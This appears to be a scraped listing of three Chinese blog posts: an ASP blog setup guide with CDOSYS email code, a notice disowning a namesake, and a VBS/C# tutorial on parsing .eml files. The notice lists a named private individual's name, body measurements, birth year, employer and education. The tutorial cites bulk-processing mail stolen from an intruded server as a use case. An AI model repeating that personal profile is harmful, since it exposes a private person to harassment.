18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 <% ' CDOSYS 发邮件、Win7 无组件发送、支持 Godaddy 的发邮件代码、非 Jmail(使用 godaddy 公共 SMTP 服务器 relay-hosting.secureserver.net 不需要用户密码验证,需要系统:Windows/IIS) ' 注意:Godaddy 的空间/虚拟主机禁止了所有三方 SMTP 服务器,只能用他自己服务器。注意需要使用 utf-8 编码,否则乱码! ' http://blog.csdn.net/tangolivesky/article/details/6266985 ' https://sg.godaddy.com/zh/help/using-cdosys-to-send-email-from-your-windows-hosting-account-1073 ' 1、发现很有意思的地方,就是发件人可以随意填写,都能发送成功,根本不需要什么godaddy的企业邮局,这一点让我很惊讶。 ' 2、objMail.BodyPart.Charset="utf-8" 增加了编码定义功能,发送邮件不再乱码 ' 3、邮件到达的速度时快时慢,有时候可以达到秒速,有时候可能要好几分钟 ' 4、进垃圾邮箱几率很大,需要加白名单 ' 创建组件 dim CDOMail, STUl set CDOMail = CreateObject("CDO.Message") ' 设置邮件参数 CDOMail.From = "from@163.com" '发信人 CDOMail.To = "to@163.com" '收信人 CDOMail.Subject = "标题" '标题 CDOMail.BodyPart.Charset = "utf-8" '编码 CDOMail.HTMLBody = "内<br>容" 'Html 内容 ' CDOMail.TextBody = "邮件内容" '文本内容 ' CDOMail.AddAttachment "D:\www\images\right.png" '附件 ' 配置 SMTP 服务器 STUl = "http://schemas.microsoft.com/cdo/configuration/" With CDOMail.Configuration.Fields .Item(STUl & "sendusing") = 2 '发送使用端口 .Item(STUl & "smtpserverport") = 25 'SMTP服务器端口 .Item(STUl & "smtpconnectiontimeout") = 60 '连接超时(秒) .Item(STUl & "smtpserver") = "relay-hosting.secureserver.net" 'Godaddy 公共 SMTP 服务器(不需要用户密码验证) ' .Item(STUl & "smtpserver") = "smtp.163.com" 'SMTP服务器地址 ' .Item(STUl & "smtpauthenticate") = 1 '远程服务器需要验证 ' .Item(STUl & "sendusername") = "from@163.com" '发送方邮箱地址 ' .Item(STUl & "sendpassword") = "password" '发送方邮箱密码 .Update End With '执行发送 CDOMail.Send %> 初始化设置 1、启用父路径   IIS -> 网站 -> 网站名 -> Asp -> 启用父路径 -> True   否则会报错: 1 2 3 4 5 6 7 Active Server Pages 错误 'ASP 0131' 不允许的父路径 /liuyan/index.asp,行 1 包含文件“../Inc/Conn.asp”不能用“..”表示父目录。   或者你把所有包含文件改成绝对路径,就不用修改该设置了,但是如果运行在子目录兼容性会变差。 2、兼容 ≥ IIS 7.0   IIS 7.0 及更高版本使用 32 位 mdb 数据库必须进行如下操作:   IIS -> 应用程序池 -> 网站名 -> 右键高级设置 -> 启用 32 位应用程序 -> True   否则会报错: 1 2 3 4 5 ADODB.Connection 错误 '800a0e7a' 未找到提供程序。该程序可能未正确安装。 /Inc/Conn.asp,行 33 3、临时调试程序   【警告:如非调试请勿进行此操作】   如需临时调试程序代码,请执行以下操作:   IIS -> 网站 -> 网站名 -> Asp -> 编译/调试 -> 将错误发送到浏览器 -> True   并注释掉相关文件的 On Error Resume Next,共有以下文件: 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 file.asp 4:On Error Resume Next index_bak.asp 29:On Error Resume Next admin\File_UpLoad_Class.asp 430: On Error Resume Next 470: On Error Resume Next liuyan\liuyan.asp 4:On Error Resume Next liuyan\index.asp 4:On Error Resume Next index.asp 29:On Error Resume Next 4、一些其他设置   /inc/conn.asp 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 <% '... '是否以CDN模式运行(获取访客真实IP地址) IsCDN = False '缓存文件存放目录,切记最后要加:\ CachePath = Server.MapPath("/cache/") & "\" '主数据库路径(存放:文章、留言、配置) DataPath = Server.MapPath("/inc/0b1214c54b5a59d3_data.mdb") '文件数据库路径(存放:文件) DataPath_File = Server.MapPath("/inc/0b1214c54b5a59d3_file.mdb") '... %> 网站模板   模板很简单,由于全站页面并不多,所以只有几个 .html 文件,所有模板相关的文件都储存在 \image\,具体参考上边的文件结构,采用 html + 标签替换的方式生成实际页面内容,具体可以参考 index.asp 和 /inc/conn.asp 中的代码。   模板支持的标签和变量 有效范围 变量标签 功能描述       全局变量 {网站名称}、{网站域名} 网站名称、网站域名。 全局变量 {主页描述}、{主页关键字} 主页的描述、关键词,给搜索引擎蜘蛛看的,SEO 优化用的。 全局变量 {推荐内容}、{友情链接} 自定义的推荐内容、友情链接代码。 全局变量 {统计代码} 统计用的JS代码。 全局变量 {顶部广告}、{底部广告} 两个独立的广告代码。 全局变量 {当前页码} 当前文章或列表的页码,首页为 0。 全局变量 {随机数} 产生一个随机数,一般用来做防采集,随机乱码用的。       主页变量 {最新内容} 按ID从大到小排序(倒叙)的文章列表。 主页变量 {最多浏览} 按点击数从大到小排序(倒叙)的文章列表。 主页变量 {随便看看} 随机提取的文章列表。       列表变量 {文章列表}、{页码列表} 按照ID或点击数从大到小排列的文章列表及页码。       文章变量 {标题}、{作者}、{内容} 文章的标题、作者及内容。 文章变量 {时间}、{修改}、{点击数} 文章的发表、最后修改时间,以及点击数。 文章变量 {关键字}、{描述} 文章的关键词、描述,给搜索引擎蜘蛛看的,SEO 优化用的。 文章变量 {默认作者} 文章的默认作者,会替换为系统设置里指定的值。 文章变量 {简单描述} 截取适当长度的文章描述,在文章页面顶部做简单显示。 文章变量 {上一篇链接}、{上一篇标题} 上一篇文章的ID(编号)、标题。 文章变量 {下一篇链接}、{下一篇标题} 下一篇文章的ID(编号)、标题。 文章变量 {本页链接} 当前文章页面的完整 Url 地址,用于在转载信息里调用。 文章变量 {评论数} 当前文章对应的评论条数。   提示:测试模板的时候记得禁用缓存或者隔一秒自动删除缓存文件,以便查看最新修改后的效果,这是一个自动循环删除缓存的批处理例子: 1 2 3 4 5 6 7 8 9 echo off & cls echo 为防止意外执行造成数据丢失,请按任意键以继续…… echo. pause :1 del /s /f /q /a "%cd%\cache\*.*" ping 127.0.0.1 -w 1 -n 3 goto 1   以上代码保存到:\网站跟目录\清理缓存.bat   提示:默认的模板经过长期微调,对各大搜索引擎的 SEO 十分友好,可以参考。 下载地址   Nuclear-Blog v7.2,需要 WinRAR 5.0 或更高版本解压。   w3 JMail v4.5 免费版.msi,JMail 发送邮件组件,新留言自动发邮件提醒用的。 相关截图

2020/5/30
articleCard.readMore

★ 公告 ★ 关于西安另一个“核攻击” ★ 郭瑞 ★

首先概述一下关键信息,我网名叫核攻击,人送外号“核总”,从事网络安全行业已有十多年,常年混迹于国内外各大安全圈,在 T00ls、乌云等各大知名网站、平台的账号(ID)均为“核攻击”(部分不能使用中文字符的网站 ID 为 Nuclear’Atk),经过十多年的摸爬滚打,积累了雄厚的技术知识,略得行内朋友追捧,在国内安全行业略有小名,唯一的官网网址为 lcx.cc,具体请看我的个人介绍。   大概从两三年前开始,陆续有朋友问我,西安某域网络公司(早期为:西安某象网络公司)有个叫核攻击的技术人员是否我本人,我均回答:“不知道,不是我本人。”   从业十余年,历史上有意或无意使用相同或高度相似网名、称号、ID、账号的人非常多(参考历史文章),毕竟这只是个网名,谁都可以用,而且中国这么大、人口这么多,重名重姓并不稀奇,并且精力有限也顾不过来,没必要去计较太多……   但是最近一段时间,陆续有朋友向我打听投资某区块链项目如何,说是该项目的技术负责人就是西安某域网络公司的这个“核攻击”,于是便以为是我本人,我一脸懵逼回答:“不清楚,我没听说也没搞过这项目,不是我本人。”   就在前几天,我抽空仔细想了一下,由于现在市面上区块链等类似投资项目比较敏感,无论上述项目是否安全属实,我都认为这个事情很有必要避嫌,避免以后产生关联……   所以我(核攻击(https://lcx.cc/))抽空通过百度搜索引擎简单查询了下这个人,发现他自 2015 年起(或更早)就在网络上及日常工作生活中对外吹嘘自己是中国知名黑客、乌云 ID 核攻击等等,近几年业务主要以区块链类项目为主。   相关结果如下所示,文中所有资料均来自国家企业信用信息公示系统或第三方权威且公开的机构或公司或QQ、微信个人资料查询所得,不涉及任何人的隐私信息。   总之一句话,核攻击只是个网名,我可以叫核攻击,你也可以叫“核攻击”,其他任何人也都可以叫“核攻击”,但是其他叫核攻击的人正在做的项目或者未来即将做的任何事情,都和我没有任何关系。 个人资料   姓名:郭瑞   性别:男   身高:183cm   体重:200+ (估计)   年龄:32 (1987)   星座:水瓶座 (1.20 - 2.18)   公司:西安某域网络公司   职业:企业法人、技术研发   先后毕业于西安音乐学院打击乐专业、西安工业大学电子工程专业。 相关照片

2019/11/26
articleCard.readMore

.eml 邮件文件格式解析(MIME) 提取内容 附件

.eml 后缀的邮件文件相信大家并不陌生,应该都见过,没见过也不要紧,随便找个邮箱,选择一封邮件,然后导出或者显示邮件原文,就能看到 .eml 文件格式或者内容了。   在这里科普一下:   EML 格式是微软公司为 Outlook 和 Outlook Express 开发的文件格式。   EML 文件是将邮件归档后生成的文件,保留着原来的HTML格式和标题。大多数邮件客户端都支持EML格式。   .eml 其实是纯文本文件,内容格式为 MIME,继续科普一下:   MIME,英文全称为“Multipurpose Internet Mail Extensions”,即多用途互联网邮件扩展,是目前互联网电子邮件普遍遵循的邮件技术规范。   MIME 邮件由邮件头和邮件体两部分组成。   邮件头包括:标题,送信人,收信人,创建日期,邮件体内容类型和邮件体编码方式等内容。   邮件体包括:正文,超文本,内嵌数据和附件等内容。   MIME 技术规范的完整内容由 RFC 2045-2049 定义,包括了信息格式、媒体类型、编码方式等各方面的内容。   MIME 格式内容具有一定的编码,一般为 base64 或 quoted-printable 编码算法。   如果 eml 文件数量不多的话,人工或者手工挨个打开阅读是可行的,但是如果一次需要处理成千上万封邮件内容并提取分析附件文件数据,那么就是相当痛苦的一件事了。   举个例子,例如某黑客入侵渗透了某公司内网邮件服务器,导出了海量邮件 .eml 文件,准备日后做关键信息提取以及数据分析,那么就必须得使用程序自动化批量处理了。   核总(https://lcx.cc/)由于某次工作需要,需要处理大量 .eml 邮件文件,于是进行了一番研究。 解析方法   虽然核总在日常工作中经常接触 .eml 文件,但是对其具体结构并不是十分了解,只知道这是纯文本文件,内容具有一定编码,一般以 base64 为主。   经过一番搜索后,其实目前主流解析邮件文件的方法基本都是先直接读取文本内容,然后逐行进行解码分析(其实就是对 MIME 格式的分析)。   这种方法虽然简单,但是缺点也很明显,需要自己写大量代码逐行解析 MIME 格式内容,很麻烦、效率低,而且根据每个人经验水平高低,可能产生大量解码错误。   那么核总(https://lcx.cc/)就想到既然这个格式已经出现很多年了,那么系统是否有自带 dll、函数、组件已经封装了个这个功能呢?避免重复造轮子?   于是,核总又进行了更深入的搜索+学习,发现既然微软的 Outlook Express 是可以保存和打开并发送 EML 文件的,那么肯定也是可以解析 EML 文件的。   那么问题就来了,我们是否可以直接利用微软现有的功能呢?答案当然是可以的!那就是“Cdosys.dll”! Cdosys.dll   Cdosys.dll 又称为 CDOSYS,包含了一系列邮件相关的 COM 组件,从 Windows 2000 开始被正式引入的,后续的操作系统都支持,关于 Cdosys.dll 的细节,请看 MSDN 文档。   使用方法也极其简单,以邮件内容解析为例,核总(https://lcx.cc/)在底下用 vbs 脚本写了个简单例子(目前全网最全的功能),其他语言可以照抄。 vbs 例子 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 dim ado, oMsg Set ado = CreateObject("Adodb.Stream") set oMsg = CreateObject("CDO.Message") ' 读取文件二进制数据流 ado.Type = 1 '设置读取模式:1 = Binary,2 = Text ado.Mode = 3 '1 只读,2 写入,3 读写。 ado.Open ado.Loadfromfile "C:\Users\lcx.cc\Desktop\3.eml" ' 将EML数据流载入到CDO.Message oMsg.DataSource.OpenObject ado, "_stream" ' 解析内容(每个字段不一定有,记得进行错误判断) on error resume next wscript.echo ado.Size '文件大小 wscript.echo oMsg.Subject '标题 wscript.echo oMsg.From '发信人 wscript.echo oMsg.Sender '寄件人(实际提交邮件的用户或代理的地址) wscript.echo oMsg.ReplyTo '回信收件人(用户直接回复邮件时, reply-to 就是默认的收件人. 如果用户不指定它, from 就是默认的收件人.) wscript.echo oMsg.SentOn '发送时间(此消息提交给服务器的日期/时间) wscript.echo oMsg.CC '抄送 wscript.echo oMsg.BCC '密送 wscript.echo oMsg.To '收信人 wscript.echo oMsg.ReceivedTime '接收时间 wscript.echo oMsg.BodyPart.Charset '邮件内容编码 wscript.echo oMsg.BodyPart.ContentTransferEncoding '通过网络发送时使用的编码 wscript.echo oMsg.HTMLBodyPart.Charset 'Html内容编码 wscript.echo oMsg.HTMLBody 'Html内容 wscript.echo oMsg.TextBodyPart.Charset '文本内容编码 wscript.echo oMsg.TextBody '文本内容 ' 附件 wscript.echo oMsg.Attachments.Count if oMsg.Attachments.Count > 0 Then Dim attach 'as CDO.BodyPart For Each attach In oMsg.Attachments wscript.echo attach.ContentMediaType '附件文件类型 wscript.echo attach.FileName '附件文件名 wscript.echo attach.GetDecodedContentStream.SaveToFile(attach.FileName, 2) '将附件二进制数据保存为源文件(1=不存在时新建/存在时报错(默认), 2=不存在时新建/存在时覆盖) Next End if ' 关闭 ado.Close   上边的代码可以实现邮件内容的提取,例如:收件人、发件人、时间、标题、内容、编码等信息。   还可以直接提取原始邮件附件二进制文件数据并保存为原文件,以供后续其他分析。 参考资料   MSDN CDOEX 参考   MSDN IMessage 接口   MIME邮件(EML文件)格式分析   eml文件的解析和发送   如何使用Visual C#使用Cdosys.dll库发送带附件的电子邮件 重要摘录   另外摘录了一些重要内容备用,以防以后原网页被删除用作参考。 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 186 187 188 189 190 191 192 193 194 195 196 197 198 199 200 201 202 203 204 205 206 207 208 209 210 211 212 213 214 215 216 217 218 219 220 221 222 223 224 225 226 227 228 229 230 231 232 233 234 235 236 237 238 239 240 241 242 243 244 245 246 247 248 249 250 251 252 253 254 255 256 257 258 259 260 261 262 263 264 265 266 267 268 269 270 271 272 273 274 275 276 277 278 279 280 281 282 283 284 285 286 287 288 289 290 291 292 293 294 295 296 297 298 299 300 301 302 303 304 305 306 307 308 309 310 311 312 313 314 315 316 317 318 319 320 321 322 323 324 325 326 327 328 329 330 331 332 333 334 335 336 337 338 339 340 341 342 343 344 345 346 347 348 349 350 351 352 353 354 355 356 357 358 359 360 361 362 363 364 365 366 367 368 369 370 371 372 373 374 375 376 377 378 379 380 381 382 383 384 385 386 387 388 389 390 391 392 393 394 395 396 397 398 399 400 401 402 403 404 405 406 407 408 409 410 411 412 413 414 415 416 417 418 419 420 421 422 423 424 425 426 427 428 429 430 431 432 433 434 435 436 437 438 439 440 441 442 443 444 445 446 447 448 449 450 451 452 453 454 455 456 457 458 459 460 461 462 463 464 465 466 467 468 469 470 471 472 473 474 475 476 477 478 479 480 481 482 483 484 485 486 487 488 489 490 491 492 493 494 495 496 497 498 499 500 501 502 503 504 505 506 507 508 509 510 511 512 513 514 515 516 517 518 519 520 521 522 523 524 525 526 527 528 529 530 531 532 533 534 535 536 537 538 539 540 541 542 543 544 545 546 547 548 549 550 551 552 553 554 555 556 557 558 559 560 561 562 563 564 565 566 567 568 569 570 571 572 573 574 575 576 577 578 579 580 581 582 583 584 585 586 587 588 589 590 591 592 593 594 [Mail]MIME邮件(EML文件)格式分析 2008-11-10 13:18 阅读(2433)评论(0) http://hankundev.blog.sohu.com/104046669.html MIME,英文全称为“Multipurpose Internet Mail Extensions”,即多用途互联网邮件扩展,是目前互联网电子邮件普遍遵循的邮件技术规范。 MIME邮件由邮件头和邮件体两部分组成。 邮件头包括:标题,送信人,收信人,创建日期,邮件体内容类型和邮件体编码方式等内容。 邮件体包括:正文,超文本,内嵌数据和附件等内容。 MIME技术规范的完整内容由RFC 2045-2049定义,包括了信息格式、媒体类型、编码方式等各方面的内容,本文只介绍其中的一些关键的格式和规范。 1.域 MIME邮件中的重要信息都记录在邮件内的各个域中。 域的基本格式是 {域名}:{内容}。 一个域占一行或多行,域的首行左侧不能有空白字符,占多行的域其后续行必须以空白字符开头。 域的信息内容中还可以包含属性,属性之间以“;”分隔,属性格式是{属性名}="{属性值}"。 域的内容的编码格式是"=?"+编码名称+"?"+B/Q+"?"+编码后的字符序列+"?="。(B代表base64的编码方式,Q代表quoted-printable的编码方式) 2.Content-Type域 Content-Type域定义了邮件中各种内容的形式及属性。 Content-Type域的基本格式是 Content-Type:{主类型}/{子类型}。 Content-Type的主类型分text,image,audio,video和application五种离散类型以及multiple和message两种复合类型。 text类型有plain和html两种常用的子类型。 multiple类型有mixed,alternative和related三种常用的子类型。 3.multiple类型 ·multiple类型基本格式 multiple类型基本格式是 Content-Type: multipart/{子类型};boundary="{分段标识}" 三种子类型的对比: ------------------------------------------------------------------ |类型名 |邮件种类 |boundary作用 | ------------------------------------------------------------------ |multiple/mixed |有附件 |分隔各附件内容和邮件其他内容 | ------------------------------------------------------------------ |multiple/alternative|有超文本 |分隔纯文本,超文本和邮件其他内容| ------------------------------------------------------------------ |multiple/related |有内嵌资源|分隔各内嵌资源和邮件其他内容 | ------------------------------------------------------------------ ·boundary属性 multiple子类型中都定义了各自的boundary属性,邮件中使用boundary中定义的字符串作为标识,将邮件内容分成不同的段,段内每个字段以"--"+boundary中定义的字符串开始,父段则以"--"+boundary中定义的字符串+"--"结束,不同段之间用空行分隔。 ·multiple类型的层次关系 ------------------------------ |multiple/mixed | ------------------------------ | |multiple/related | | ------------------------------ | | |multiple/alternative| | | ------------------------------ | | |纯文本正文 | | | ------------------------------ | | |超文本正文 | | | ------------------------------ | |内嵌资源 | | ------------------------------ |附件 | ------------------------------ 4.Content-Transfer-Encoding域 Content-Transfer-Encoding域定义段内文字的编码方式,不同段可以有不同的编码方式。 MIME邮件中的数据编码普遍采用base64和quoted-printable两种编码。 ·base64编码的算法 编码的原则是将输入数据全部转换成由{'A'-'Z','a'-'z','0'-'9','+','/'}64个ASCII字符组成的字符序列。 编码时将需要转换的数据每次取出6bit,然后转换成十进制数字,查询64个ASCII字符组成的字典表,输出对应位置的ASCII码字符。每3个字节的数据内容会被转换成4个字典中的ASCII码字符。当转换后的数据不是4的整倍数时,用"="来填充。 ·quoted-printable编码的算法 编码的原则是将输入的数据转换成可打印的ASCII码字符。 编码时根据读入内容来决定是否进行编码,如果读入的字节处于33-60,62-126范围内,属可直接打印的ASCII字符,则直接输出,否则将该字节分为两个4bit,每个用一个十六进制数来表示,然后再前面加上"=",每个需要编码的字节被转换成三个字符来表示。 ---------- 分开邮件的各个部分,应该是用正则了.分开之后,对内容做读取的时候,需要用base64和qp两种解码,要根据邮件相关信息来确定具体用哪一种. 一般邮件获取内容编码方式的正则的写法应该是下面这个样子 C# code private const string encodingReg = "(?<=(Content\\-Transfer\\-Encoding\\:)).*"; 做一个TextAnalyze方法来统筹分析 C# code //c 内容 //charset,文字编码方式,utf-8/gb2312等等 //encoding,加密编码方式,包括qp和base64两种 //因为encoding获得的加密编码标志可能不同,所以用了switch. private string TextAnalyze(string c, string charset, string encoding) { switch (encoding.ToLower()) { case "quoted-printable": case "qp": case "q": try { c = QDecode(Encoding.GetEncoding(charset), c); } catch (Exception e) { throw new Exception("TextAnalyze(quoted-printabl)" + e.Message); } break; case "base64": case "b": try { c = DecodeBase64(charset, encoding); } catch (Exception e) { throw new Exception("TextAnalyze(DecodeBase64)" + e.Message); } break; } return c; } base64在c#中处理很简单了,就放一个qp的解码.这个也是在网上辛苦搜到的.当时自己水平太凹,总编不好. C# code /// <summary> /// quoted-printable解码程序. /// </summary> /// <param name="encoding">解码目标字符集</param> /// <param name="data">需要解码的字符串</param> /// <returns></returns> private static string QDecode(System.Text.Encoding encoding, string data) { MemoryStream strm = new MemoryStream(System.Text.Encoding.Default.GetBytes(data)); int b = strm.ReadByte(); MemoryStream dStrm = new MemoryStream(); while (b > -1) { // Hex eg. =E4 if (b == '=') { byte[] buf = new byte[2]; strm.Read(buf, 0, 2); if (!(buf[0] == '\r' && buf[1] == '\n')) { int val = int.Parse(System.Text.Encoding.Default.GetString(buf), System.Globalization.NumberStyles.HexNumber); //int val = int.Parse(System.Text.Encoding.Default.GetString(buf)); byte[] temp = new Byte[] { (byte)val }; dStrm.Write(temp, 0, temp.Length); } } else { string encodedChar = encoding.GetString(new byte[] { (byte)b }); byte[] d = System.Text.Encoding.Default.GetBytes(encodedChar); dStrm.Write(d, 0, d.Length); } b = strm.ReadByte(); } return encoding.GetString(dStrm.ToArray()); } 当时对我来讲最困难的就是qp这部分了,这部分解决之后其他的都很好办的.不知道你什么情况. ---------- 和大家分享一个解决方案,使用这种方法,可以非常容易读取和"EML"邮件相关的所有信息 1、添加COM组件cdosys.dll的引用,如图 2、相关代码 /// <summary> /// 获取eml文件的主体内容 /// </summary> /// <param name="file">eml文件的路径</param> /// <returns>eml文件的主体内容</returns> public string ReadEML(string file) { CDO.Message oMsg = new CDO.Message(); ADODB.Stream stm = null; //读取EML文件到CDO.MESSAGE,做分析的话,实际是用了下面的部分 try { stm = new ADODB.Stream(); stm.Open(System.Reflection.Missing.Value, ADODB.ConnectModeEnum.adModeUnknown, ADODB.StreamOpenOptionsEnum.adOpenStreamUnspecified, "", ""); stm.Type = ADODB.StreamTypeEnum.adTypeBinary;//二进制方式读入 stm.LoadFromFile(file); //将EML读入数据流 oMsg.DataSource.OpenObject(stm, "_stream"); //将EML数据流载入到CDO.Message,要做解析的话,后面就可以了。 } catch (IOException ex) { } finally { stm.Close(); } return oMsg.HTMLBody;//oMsg里包含了邮件相关的所有信息 } 有关“cdosys.dll”模块可以到网上进一步了解,使用它可以方面的完成邮件的所有功能 ---------- eml文件的解析和发送 https://www.cnblogs.com/a-zx/articles/2179255.html 转自:http://www.zu14.cn/2009/05/20/read-analyze-send-eml-as-mail-by-csharp-cdosys/ 最近,我发布了几篇关于 .NET 和 EML 文件的邮件相关 的博文,引来了一些网友的关注与讨论。尤其是对于“如何解析EML文件的内容”和 “发送现有的EML文件”。 目前,比较主流的解析EML文件的方式,基本是对MIME格式的分析,基于对 RFC822及其后续扩展的标准 的理解。但是,此种方法工作量太大,且过于繁琐。 我是个懒人,喜欢找捷径 大家都知道,微软的 outlook express 是可以保存和打开并发送EML文件的。那么很明显,outlook express 肯定是可以解析EML文件的。 问题就来了:我们可不可以利用微软现有的成果呢? 针对这个问题,我们再回到.NET中发送邮件的功能上,为了体现的明显,我们回到.NET 1.1上,.NET 1.1 发送邮件的是 System.Web.Mail ,这个System.Web.Mail 当时是比较弱的,原因就是它是基于 cdosys.dll 的基础上的且并未做富实现。 cdosys.dll是从windows 2000 开始被正式引入的,后续的操作系统都支持,关于cdosys.dll的细节,请看MSDN。 经过一个晚上对cdosys的研究,终于得出了结果:CDOSYS是可以加载eml文件并进行解析和直接发送的。 cdosys属于COM,在.NET使用,需要添加COM引用。 CDOSYS 添加引用,会在项目的引用里出现下面的2项: image 下面我对发送EML文件,封装了一个类(只做了基本封装,大家可以自己扩展) /// <summary> /// 功能: 发送EML文件 /// 作者: 三角猫 /// 网址: http://www.zu14.cn /// 声明: 转载务必保留此信息 /// </summary> public class EmlSender { private string emlFilePath; private string smtpServer; private string smtpServerPort = "25"; private string smtpUserName; private string smtpPassword; /// <summary> /// 构造函数 /// </summary> /// <param name="EmlFilePath">EML文件的绝对路径</param> public EmlSender(string EmlFilePath) { emlFilePath = EmlFilePath; } /// <summary> /// SMTP服务器地址 /// </summary> public string SmtpServer { set { smtpServer = value; } } /// <summary> /// SMTP服务器端口号 /// </summary> public string SmtpServerPort { set { smtpServerPort = value; } } /// <summary> /// SMTP服务器认证帐号 /// </summary> public string SmtpUserName { set { smtpUserName = value; } } /// <summary> /// SMTP服务器认证密码 /// </summary> public string SmtpPassword { set { smtpPassword = value; } } /// <summary> /// 使用CDOSYS发送EML文件 /// </summary> public void Send() { CDO.Message oMsg = new CDO.Message(); CDO.IConfiguration iConfg = oMsg.Configuration; ADODB.Fields oFields = iConfg.Fields; //设置CDO相关的发送参数,主要是用于SMTP服务器的认证 ADODB.Field oField = oFields["http://schemas.microsoft.com/cdo/configuration/sendusing"]; oField.Value = "2"; oField = oFields["http://schemas.microsoft.com/cdo/configuration/smtpserverport"]; oField.Value = smtpServerPort; oField = oFields["http://schemas.microsoft.com/cdo/configuration/smtpserver"]; oField.Value = smtpServer; oField = oFields["http://schemas.microsoft.com/cdo/configuration/languagecode"]; oField.Value = "0x0804"; //下面三项可以自己根据需要去填写,我比较懒 oField = oFields["http://schemas.microsoft.com/cdo/configuration/sendemailaddress"]; oField.Value = ""; oField = oFields["http://schemas.microsoft.com/cdo/configuration/smtpuserreplyemailaddress"]; oField.Value = ""; oField = oFields["http://schemas.microsoft.com/cdo/configuration/smtpaccountname"]; oField.Value = ""; //------------------------ oField = oFields["http://schemas.microsoft.com/cdo/configuration/smtpconnectiontimeout"]; oField.Value = "60"; oField = oFields["http://schemas.microsoft.com/cdo/configuration/sendusername"]; oField.Value = smtpUserName; oField = oFields["http://schemas.microsoft.com/cdo/configuration/sendpassword"]; oField.Value = smtpPassword; oField = oFields["http://schemas.microsoft.com/cdo/configuration/smtpauthenticate"]; oField.Value = "1"; oFields.Update(); try { //读取EML文件到CDO.MESSAGE,做分析的话,实际是用了下面的部分 ADODB.Stream stm = new ADODB.Stream(); stm.Open(System.Reflection.Missing.Value, ADODB.ConnectModeEnum.adModeUnknown, ADODB.StreamOpenOptionsEnum.adOpenStreamUnspecified, "", ""); stm.Type = ADODB.StreamTypeEnum.adTypeBinary;//二进制方式读入 stm.LoadFromFile(emlFilePath); //将EML读入数据流 oMsg.DataSource.OpenObject(stm, "_stream"); //将EML数据流载入到CDO.Message,要做解析的话,后面就可以了。 stm.Close(); oMsg.Send(); //发送 } catch { throw; } finally { oField = null; oFields = null; oMsg = null; } } } 使用方法: EmlSender eml = new EmlSender(@"d:\a.eml"); eml.SmtpServer = "smtp.zu14.cn"; eml.SmtpServerPort = "25"; eml.SmtpUserName = "admin@zu14.cn"; eml.SmtpPassword = "*****"; eml.Send(); 至此,.NET 关于MAIL 和 EML 相关的内容,算是告一段落了。 ---------- 如何使用Visual C#使用Cdosys.dll库发送带附件的电子邮件 https://support.microsoft.com/zh-cn/help/310212/how-to-use-the-cdosys-dll-library-to-send-an-e-mail-message-with-attac 摘要 本文介绍如何使用Windows 2000库协作数据对象(CDO)(Cdosys.dll)发送带附件的电子邮件。您可以使用本地SMTP服务器或Microsoft Visual C#中的智能主机服务器在电子邮件正文中发送文本或HTML或网页。 注意 Cdosys.dll库也称为CDOSYS。 更多信息 要按照“摘要”部分中的说明使用CDOSYS,请按照下列步骤操作: 启动Microsoft Visual Studio。 在“ 文件”菜单上,单击“ 新建”,然后单击“ 项目”。 在项目类型下,单击Visual C#,然后单击模板下的控制台应用程序。默认情况下,会创建Program.cs。注意在Microsoft Visual C#.NET 2003中,Visual C#更改为Visual C#Projects。默认情况下,创建Class1.cs。 添加对Microsoft CDO For Windows 2000 Library的引用。为此,请按照下列步骤操作: 在“ 项目”菜单上,单击“ 添加引用”。 在COM选项卡上,找到Microsoft CDO For Windows 2000 Library。 注意在Visual C#.NET 2003中,单击“ 选择”。 要接受您的选择,请在“ 添加引用”对话框中单击“ 确定 ”。如果您收到一个对话框来为您选择的库生成包装器,请单击“ 是”。 在代码窗口中,使用以下代码替换所有代码: namespace CdoSys { using System; class Class1 { static void Main(string[] args) { try { CDO.Message oMsg = new CDO.Message(); CDO.IConfiguration iConfg; iConfg = oMsg.Configuration; ADODB.Fields oFields; oFields = iConfg.Fields; // Set configuration. ADODB.Field oField = oFields["http://schemas.microsoft.com/cdo/configuration/sendusing"]; //TODO: To send by using the smart host, uncomment the following lines: //oField.Value = CDO.CdoSendUsing.cdoSendUsingPort; //oField = oFields["http://schemas.microsoft.com/cdo/configuration/smtpserver"]; //oField.Value = "smarthost"; // TODO: To send by using local SMTP service. //oField = oFields["http://schemas.microsoft.com/cdo/configuration/sendusing"]; //oField.Value = 1; oFields.Update(); // Set common properties from message. //TODO: To send text body, uncomment the following line: //oMsg.TextBody = "Hello, how are you doing?"; //TODO: To send HTML body, uncomment the following lines: //String sHtml; //sHtml = "<HTML>\n" + //"<HEAD>\n" + //"<TITLE>Sample GIF</TITLE>\n" + //"</HEAD>\n" + //"<BODY><P>\n" + //"<h1><Font Color=Green>Inline graphics</Font></h1>\n" + //"</BODY>\n" + //"</HTML>"; //oMsg.HTMLBody = sHtml; //TOTO: To send WEb page in an e-mail, uncomment the following lines and make changes in TODO section. //TODO: Replace with your preferred Web page //oMsg.CreateMHTMLBody("http://www.microsoft.com", //CDO.CdoMHTMLFlags.cdoSuppressNone, //"", ""); oMsg.Subject = "Test SMTP"; //TODO: Change the To and From address to reflect your information. oMsg.From = "someone@example.com"; oMsg.To = "someone@example.com"; //ADD attachment. //TODO: Change the path to the file that you want to attach. oMsg.AddAttachment("C:\\Hello.txt", "", ""); oMsg.AddAttachment("C:\\Test.doc", "", ""); oMsg.Send(); } catch (Exception e) { Console.WriteLine("{0} Exception caught.", e); } return; } } } 如果TODO出现在代码中,请按照指示修改代码。 要构建和运行程序,请按F5。 验证是否已发送和接收电子邮件。 参考 有关使用Visual 